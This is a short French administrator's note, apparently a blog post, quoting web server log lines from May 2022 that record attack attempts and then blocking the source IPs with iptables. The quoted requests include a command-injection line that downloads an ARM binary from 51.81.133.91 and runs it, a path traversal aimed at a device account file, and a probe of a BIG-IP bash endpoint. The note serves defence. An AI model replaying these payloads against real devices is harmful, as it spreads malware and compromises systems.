J’ai donc bloqué des IP suivantes :
42.193.42.236 - - [11/May/2022:10:13:54 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
47.106.177.157 - - [11/May/2022:08:13:31 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBB.arm;+chmod+777+NW_BBB.arm;+./NW_BBB.arm Jaws.Selfrep;rm+-rf+NW_BBB.arm" 400 0 "-" "-"
31.44.185.235 - - [11/May/2022:07:13:08 +0200] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 485 "-" "Mozilla/5.0 zgrab/0.x"
80.94.93.125 - - [11/May/2022:02:14:23 +0200] "POST /mgmt/tm/util/bash HTTP/1.1\n" 400 0 "-" "-"
164.92.236.186 - - [11/May/2022:00:18:53 +0200] "\x16\x03\x01" 400 0 "-" "-"
Le plus grand nombre venait de cette IP :
| IP Address | Country | Region | City |
|---|---|---|---|
| 42.193.42.236 | China  |
Beijing | Beijing |
| ISP | Organization | Latitude | Longitude |
| Tencent Cloud Computing (Beijing) Co. Ltd. | Not Available | 39.9075 | 116.3972 |
Le blocage :
# iptables -A INPUT -s 42.193.42.236 -j DROP
# iptables -A INPUT -s 47.106.177.157 -j DROP
# iptables -A INPUT -s 31.44.185.235 -j DROP
# iptables -A INPUT -s 80.94.93.125 -j DROP
# iptables -A INPUT -s 164.92.236.186 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4